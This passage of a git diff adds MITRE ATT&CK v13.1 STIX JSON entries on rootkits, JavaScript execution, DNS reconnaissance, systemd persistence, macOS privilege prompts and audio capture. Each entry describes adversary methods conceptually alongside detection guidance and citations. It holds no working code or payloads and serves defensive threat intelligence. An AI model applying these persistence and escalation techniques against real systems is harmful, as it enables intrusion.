Retrieved April 25, 2019.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf" + }, + { + "source_name": "Cloudflare SynFlood", + "description": "Cloudflare. (n.d.). What is a SYN flood attack?. Retrieved April 22, 2019.", + "url": "https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/" + }, + { + "source_name": "Corero SYN-ACKflood", + "description": "Corero. (n.d.). What is a SYN-ACK Flood Attack?. Retrieved April 22, 2019.", + "url": "https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html" + }, + { + "source_name": "Arbor AnnualDoSreport Jan 2018", + "description": "Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.", + "url": "https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b.json new file mode 100644 index 0000000000000000000000000000000000000000..95e0444006a1a15c386dff053db47b08404c2f96 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b.json 
@@ -0,0 +1,80 @@ +{ + "type": "bundle", + "id": "bundle--53a33f3a-09b5-4db4-a9d4-2cf99be79908", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:50.568Z", + "name": "Rootkit", + "description": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) \n\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. 
(Citation: Wikipedia Rootkit)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "File: File Modification", + "Drive: Drive Modification", + "Firmware: Firmware Modification" + ], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "File Monitoring", + "Host Intrusion Prevention Systems", + "Application Control", + "Signature-based Detection", + "System Access Controls" + ], + "type": "attack-pattern", + "id": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", + "created": "2017-05-31T21:30:26.496Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1014", + "external_id": "T1014" + }, + { + "source_name": "CrowdStrike Linux Rootkit", + "description": "Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.", + "url": "https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/" + }, + { + "source_name": "BlackHat Mac OSX Rootkit", + "description": "Pan, M., Tsai, S. (2014). You can\u2019t see me: A Mac OS X Rootkit uses the tricks you haven't known yet. Retrieved December 21, 2017.", + "url": "http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf" + }, + { + "source_name": "Symantec Windows Rootkits", + "description": "Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017.", + "url": "https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf" + }, + { + "source_name": "Wikipedia Rootkit", + "description": "Wikipedia. (2016, June 1). Rootkit. 
Retrieved June 2, 2016.", + "url": "https://en.wikipedia.org/wiki/Rootkit" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d.json new file mode 100644 index 0000000000000000000000000000000000000000..8f58900bb496cb0a077c493f658d4fa06f36246e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d.json 
@@ -0,0 +1,103 @@ +{ + "type": "bundle", + "id": "bundle--5edc4ff1-62ee-4a4f-b82c-195bd9aeeb1c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Cody Thomas, SpecterOps" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "type": "attack-pattern", + "created": "2020-06-23T19:12:24.924Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1059.007", + "url": "https://attack.mitre.org/techniques/T1059/007" + }, + { + "source_name": "NodeJS", + "url": "https://nodejs.org/", + "description": "OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020." + }, + { + "source_name": "JScrip May 2018", + "url": "https://docs.microsoft.com/windows/win32/com/translating-to-jscript", + "description": "Microsoft. (2018, May 31). Translating to JScript. Retrieved June 23, 2020." + }, + { + "source_name": "Microsoft JScript 2007", + "url": "https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript", + "description": "Microsoft. (2007, August 15). The World of JScript, JavaScript, ECMAScript \u2026. Retrieved June 23, 2020." + }, + { + "source_name": "Microsoft Windows Scripts", + "url": "https://docs.microsoft.com/scripting/winscript/windows-script-interfaces", + "description": "Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved June 23, 2020." + }, + { + "source_name": "Apple About Mac Scripting 2016", + "url": "https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html", + "description": "Apple. (2016, June 13). About Mac Scripting. Retrieved April 14, 2021." 
+ }, + { + "source_name": "SpecterOps JXA 2020", + "url": "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5", + "description": "Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14, 2021." + }, + { + "source_name": "SentinelOne macOS Red Team", + "url": "https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/", + "description": "Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020." + }, + { + "source_name": "Red Canary Silver Sparrow Feb2021", + "url": "https://redcanary.com/blog/clipping-silver-sparrows-wings/", + "description": "Tony Lambert. (2021, February 18). Clipping Silver Sparrow\u2019s wings: Outing macOS malware before it takes flight. Retrieved April 20, 2021." + }, + { + "source_name": "MDSec macOS JXA and VSCode", + "url": "https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/", + "description": "Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans with VSCode Extensions. Retrieved April 20, 2021." + } + ], + "modified": "2021-08-16T21:02:05.142Z", + "name": "JavaScript", + "description": "Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)\n\nJScript is the Microsoft implementation of the same scripting standard. 
JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)\n\nJavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple\u2019s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple\u2019s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple\u2019s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)\n\nAdversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. 
Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_detection": "Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nMonitor for execution of JXA through osascript and usage of OSAScript API that may be related to other suspicious behavior occurring on the system.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. 
Scripts should be captured from the file system when possible to determine their actions and intent.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "2.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Module: Module Load", + "Script: Script Execution", + "Command: Command Execution", + "Process: Process Creation" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "SYSTEM" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea.json new file mode 100644 index 0000000000000000000000000000000000000000..b805320ddd61bf69b045304793029894c8615e50 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea.json 
@@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--fa5d9deb-b861-424b-a7b6-4c15f07ea7fe", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-21T14:32:48.393Z", + "name": "DNS", + "description": "Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target\u2019s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)\n\nAdversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target 
organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)" + ], + "type": "attack-pattern", + "id": "attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea", + "created": "2020-10-02T15:47:10.102Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1590/002", + "external_id": "T1590.002" + }, + { + "source_name": "Circl Passive DNS", + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.", + "url": "https://www.circl.lu/services/passive-dns/" + }, + { + "source_name": "DNS Dumpster", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.", + "url": "https://dnsdumpster.com/" + }, + { + "source_name": "Sean Metcalf Twitter DNS Records", + "description": "Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved May 27, 2022.", + "url": "https://twitter.com/PyroTek3/status/1126487227712921600/photo/1" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0fff2797-19cb-41ea-a5f1-8a9303b8158e.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0fff2797-19cb-41ea-a5f1-8a9303b8158e.json new file mode 100644 index 0000000000000000000000000000000000000000..1de2ea998fe25beac2949880c00407cd012e599b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0fff2797-19cb-41ea-a5f1-8a9303b8158e.json 
@@ -0,0 +1,85 @@ +{ + "type": "bundle", + "id": "bundle--db1fba93-f4db-49fb-9428-56e709f8f72e", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Tony Lambert, Red Canary" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0fff2797-19cb-41ea-a5f1-8a9303b8158e", + "type": "attack-pattern", + "created": "2019-04-23T15:34:30.008Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1501", + "url": "https://attack.mitre.org/techniques/T1501" + }, + { + "source_name": "Linux man-pages: systemd January 2014", + "url": "http://man7.org/linux/man-pages/man1/systemd.1.html", + "description": "Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019." + }, + { + "source_name": "Freedesktop.org Linux systemd 29SEP2018", + "url": "https://www.freedesktop.org/wiki/Software/systemd/", + "description": "Freedesktop.org. (2018, September 29). systemd System and Service Manager. Retrieved April 23, 2019." + }, + { + "source_name": "Anomali Rocke March 2019", + "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang", + "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019." + }, + { + "description": "Catalin Cimpanu. (2018, July 10). ~x file downloaded in public Arch package compromise. Retrieved April 23, 2019.", + "url": "https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a", + "source_name": "gist Arch package compromise 10JUL2018" + }, + { + "description": "Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux AUR Package Repository. 
Retrieved April 23, 2019.", + "url": "https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/", + "source_name": "Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018" + }, + { + "description": "Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved April 23, 2019.", + "url": "https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html", + "source_name": "acroread package compromised Arch Linux Mail 8JUL2018" + }, + { + "source_name": "Rapid7 Service Persistence 22JUNE2016", + "url": "https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence", + "description": "Rapid7. (2016, June 22). Service Persistence. Retrieved April 23, 2019." + } + ], + "modified": "2020-01-17T16:51:52.027Z", + "name": "Systemd Service", + "description": "Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands. \n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. 
\n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_detection": "Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of \u2018systemd\u2019, a parent process ID of 1, and will usually execute as the \u2018root\u2019 user.\n\nSuspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -\u2013type=service \u2013all. 
Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables.\n\nAuditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "root", + "User" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--101c3a64-9ba5-46c9-b573-5c501053cbca.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--101c3a64-9ba5-46c9-b573-5c501053cbca.json new file mode 100644 index 0000000000000000000000000000000000000000..9bf2e8a041d3c4fc51995b67a69d7dbe21707303 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--101c3a64-9ba5-46c9-b573-5c501053cbca.json 
@@ -0,0 +1,74 @@ +{ + "type": "bundle", + "id": "bundle--d387b0f1-6662-4f6f-9d9a-e04ef33c2c48", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Erika Noerenberg, @gutterchurl, Carbon Black", + "Jimmy Astle, @AstleJimmy, Carbon Black" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--101c3a64-9ba5-46c9-b573-5c501053cbca", + "type": "attack-pattern", + "created": "2019-08-08T14:29:37.108Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1514", + "url": "https://attack.mitre.org/techniques/T1514" + }, + { + "source_name": "AppleDocs AuthorizationExecuteWithPrivileges", + "url": "https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg", + "description": "Apple. (n.d.). Apple Developer Documentation - AuthorizationExecuteWithPrivileges. Retrieved August 8, 2019." + }, + { + "source_name": "Death by 1000 installers; it's all broken!", + "url": "https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8", + "description": "Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. Retrieved August 8, 2019." + }, + { + "source_name": "Carbon Black Shlayer Feb 2019", + "url": "https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/", + "description": "Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019." + }, + { + "source_name": "OSX Coldroot RAT", + "url": "https://objective-see.com/blog/blog_0x2A.html", + "description": "Patrick Wardle. (2018, February 17). Tearing Apart the Undetected (OSX)Coldroot RAT. 
Retrieved August 8, 2019." + } + ], + "modified": "2020-02-05T20:13:51.857Z", + "name": "Elevated Execution with Prompt", + "description": "Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_detection": "Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that 
AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "x_mitre_effective_permissions": [ + "root" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967.json new file mode 100644 index 0000000000000000000000000000000000000000..988c928f4e4f2f3edb91c2f2d069db02832b5fff --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967.json 
@@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--dd22565b-4e7f-40a2-bbe8-b826be44fbe7", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:36.503Z", + "name": "Audio Capture", + "description": "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: OS API Execution" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "id": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "created": "2017-05-31T21:31:34.528Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": 
"mitre-attack", + "url": "https://attack.mitre.org/techniques/T1123", + "external_id": "T1123" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5.json new file mode 100644 index 0000000000000000000000000000000000000000..3a922220ebcdeb1e7f1436ca64df08f24da2efdd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5.json 
@@ -0,0 +1,78 @@ +{ + "type": "bundle", + "id": "bundle--510ae511-d8fe-4e91-b7f2-471071442d5e", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "created": "2020-01-10T16:03:18.865Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1543", + "url": "https://attack.mitre.org/techniques/T1543" + }, + { + "source_name": "AppleDocs Launch Agent Daemons", + "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html", + "description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017." + }, + { + "source_name": "TechNet Services", + "url": "https://technet.microsoft.com/en-us/library/cc772408.aspx", + "description": "Microsoft. (n.d.). Services. Retrieved June 7, 2016." + }, + { + "source_name": "OSX Malware Detection", + "url": "https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf", + "description": "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. 
